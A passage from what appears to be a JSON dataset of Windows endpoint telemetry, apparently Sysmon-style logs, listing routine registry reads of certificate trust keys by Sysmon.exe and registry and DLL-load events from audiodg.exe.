"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976520000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": 
"C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "WMALFXGFXDSP.dll", - "image_path": "C:\\Windows\\System32\\WMALFXGFXDSP.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 
131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976820000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 
131883573976820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883573976820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "AudioEng.dll", - "image_path": "C:\\Windows\\System32\\AudioEng.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976670000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 